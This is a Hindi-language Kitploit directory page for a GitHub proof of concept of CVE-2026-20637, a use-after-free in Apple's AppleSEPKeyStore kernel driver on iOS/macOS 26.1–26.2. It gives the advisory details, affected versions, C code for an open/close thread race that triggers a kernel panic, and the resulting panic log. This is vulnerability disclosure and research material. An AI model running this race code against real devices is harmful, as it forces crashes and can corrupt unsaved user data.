Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-20637-AppleSEPKeyStore-UAF — CVE-2026-20637: AppleSEPKeyStore Use-After-Free — iOS/macOS कर्नेल भेद्यता (26.4 में पैच की गई) | Kitploit
उपकरण/GitHubGitHub/0xjohnnydev/cve-2026-20637-applesepkeystore-uaf
आईओएस सुरक्षाभेद्यता विश्लेषणशोषणमोबाइल सुरक्षाबाइनरी शोषण
GitHub0xjohnnydev/cve-2026-20637-applesepkeystore-uaf

CVE-2026-20637-AppleSEPKeyStore-UAF

CVE-2026-20637: AppleSEPKeyStore Use-After-Free — iOS/macOS कर्नेल भेद्यता (26.4 में पैच की गई)

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट
54721 महीना पहलेKitploit द्वारा समीक्षित

CVE-2026-20637: AppleSEPKeyStore यूज़-आफ्टर-फ्री

CVE-2026-20637 | लेखक: Johnny Franks (@zeroxjf)

घटक: AppleKeyStore

प्रभाव: कोई ऐप अप्रत्याशित सिस्टम समाप्ति का कारण बन सकता है

विवरण: बेहतर मेमोरी प्रबंधन के साथ यूज़-आफ्टर-फ्री समस्या का समाधान किया गया।

— Apple सुरक्षा सामग्री, iOS 26.3 और iPadOS 26.3

लक्षित संस्करण

iOS26.1 - 26.2 (परीक्षित)
macOS26.1 - 26.2 (परीक्षित)
घटकcom.apple.driver.AppleSEPKeyStore
पैच किया गयाiOS 26.3 / iPadOS 26.3

नोट: Apple ने इसे 26.2.1 - 26.3 के बीच धीरे-धीरे पैच किया हो सकता है, इसलिए यह मध्यवर्ती संस्करणों पर काम नहीं कर सकता है।

चेतावनी

यह PoC प्रभावित डिवाइसों को तुरंत कर्नेल-पैनिक कर देता है। चलाने से पहले काम सहेज लें; बार-बार जबरन पैनिक होने से बिना सहेजी गई स्थिति दूषित हो सकती है।

भेद्यता

IOCommandGate में यूज़-आफ्टर-फ्री, जो AppleKeyStore ओपन/क्लोज़ रेस के माध्यम से ट्रिगर होता है। आठ कॉलर थ्रेड सेलेक्टर 0-15 पर IOConnectCallMethod को बार-बार कॉल करते हैं, जबकि चार क्लोज़र थ्रेड IOServiceClose के साथ रेस करते हैं, जिससे एक ऐसी विंडो बनती है जहाँ फ्री होने के बाद कमांड गेट एक्सेस किया जाता है।

प्रूफ ऑफ कॉन्सेप्ट

root@kitploit:~
#define AKS_SERVICE_NAME "AppleKeyStore"
#define NUM_CALLERS 8
#define NUM_CLOSERS 4
#define NUM_ITERATIONS 100000

static _Atomic(io_connect_t) g_conn = IO_OBJECT_NULL;

// 8 caller threads: hammer IOConnectCallMethod (high priority)
while (!done) {
    io_connect_t conn = atomic_load(&g_conn);
    if (conn == IO_OBJECT_NULL) continue;
    for (uint32_t sel = 0; sel < 16; sel++) {
        IOConnectCallMethod(conn, sel, scalars, 6, NULL, 0, NULL, NULL, NULL, NULL);
    }
}

// 4 closer threads: race IOServiceClose (high priority)
while (!done) {
    io_connect_t conn = atomic_load(&g_conn);
    if (conn == IO_OBJECT_NULL) continue;
    IOServiceClose(conn);
    atomic_store(&g_conn, IO_OBJECT_NULL);
}

// Main thread: 100k connections, no delay
for (int i = 0; i < NUM_ITERATIONS; i++) {
    uint32_t type = (i % 4 == 0) ? 0x2022 : (i % 4 == 1) ? 0xbeef : (i % 4 == 2) ? 0x1337 : 0x4141;
    IOServiceOpen(svc, mach_task_self(), type, &conn);
    atomic_store(&g_conn, conn);
    // no delay: keep the close/call race window hot
}

पैनिक लॉग

root@kitploit:~
panic(cpu 4 caller 0xfffffff015b84ae0): [iokit.IOCommandGate]: element modified after free
  (off:72, val:0xfffffffffffffe00, sz:80, ptr:0xffffffe69b7d0db0)
   72: 0xfffffffffffffe00

Kernel version: Darwin Kernel Version 25.1.0: Thu Oct 23 11:09:22 PDT 2025;
  root:xnu-12377.42.6~55/RELEASE_ARM64_T8030

Panicked task 0xffffffe5b4f1e820: pid 956: Test

Kernel Extensions in backtrace:
   com.apple.driver.AppleSEPKeyStore(2.0)[AD3CDADB-06B6-32F5-9E47-9889901353CA]
      @0xfffffff016a47020->0xfffffff016a84f9f
टूल डाउनलोड करें